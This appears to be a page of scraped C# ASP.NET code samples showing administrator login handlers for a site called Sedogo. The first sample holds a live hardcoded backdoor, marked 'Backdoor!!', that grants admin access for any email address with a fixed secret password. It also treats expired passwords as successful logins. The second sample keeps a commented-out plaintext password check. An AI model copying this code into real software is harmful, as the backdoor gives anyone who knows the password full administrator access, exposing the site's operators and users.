Esempio n. 1
0
    //===============================================================
    // Function: loginButton_Click
    //===============================================================
    public void loginButton_Click(object sender, EventArgs e)
    {
        string loginEmailAddress = emailAddress.Text;
        string loginPassword = userPassword.Text;

        HttpCookie cookie = new HttpCookie("SedogoAdministratorEmailAddress");
        // Set the cookies value
        cookie.Value = loginEmailAddress;

        // Set the cookie to expire in 1 year
        DateTime dtNow = DateTime.Now;
        cookie.Expires = dtNow.AddYears(1);

        // Add the cookie
        Response.Cookies.Add(cookie);

        Administrator adminUser = new Administrator("");
        loginResults checkResult;
        checkResult = adminUser.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx");

        // Backdoor!!
        if (loginPassword == "!!Sed0g0")
        {
            checkResult = loginResults.loginSuccess;
            int administratorID = Administrator.GetAdministratorIDFromEmailAddress(loginEmailAddress);
            adminUser = null;

            adminUser = new Administrator("", administratorID);
        }

        if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
        {
            Session.Add("loggedInAdministratorID", adminUser.administratorID);
            Session.Add("loggedInAdministratorName", adminUser.administratorName);
            Session.Add("loggedInAdministratorEmailAddress", adminUser.emailAddress);

            if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
            {
                FormsAuthentication.SetAuthCookie(loginEmailAddress, false);

                Session.Add("SuperUserID", adminUser.administratorID);

                string url = "~/admin/main.aspx";
                Response.Redirect(url);
            }
        }
        if (checkResult == loginResults.loginFailed)
        {
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct\");", true);
        }
    }
Esempio n. 2
0
        /// <summary>
        /// Check the admin's password
        /// </summary>
        /// <param name="emailAddress">email is the login</param>
        /// <param name="password">password</param>
        /// <param name="db">database access object</param>
        /// <param name="adminId">output - admin id</param>    
        /// <param name="fullName">output - admin's name</param>
        /// <returns>authentication is successful</returns>
        public static bool VerifyAdminLogin(string emailAddress, string password, SedogoDBEntities db, out int? adminId,
            out string fullName)
        {
            adminId = null;
            fullName = null;
            var admin = new Administrator("");
            var lr = admin.VerifyLogin(emailAddress, password, false, true, "API. VerifyAdminLogin");
            if (lr == loginResults.loginSuccess)
            {
                adminId = admin.administratorID;
                fullName = admin.administratorName;
                return true;
            }
            return false;

            /*System.Data.Objects.ObjectResult<spVerifyAdministratorLogin_Result> lresult = db.spVerifyAdministratorLogin(emailAddress);
            spVerifyAdministratorLogin_Result loginResult = lresult.FirstOrDefault();
            if (loginResult != null && loginResult.AdministratorPassword == password)
            {
                adminID = loginResult.AdministratorID;
                return true;
            }
            return false;*/
        }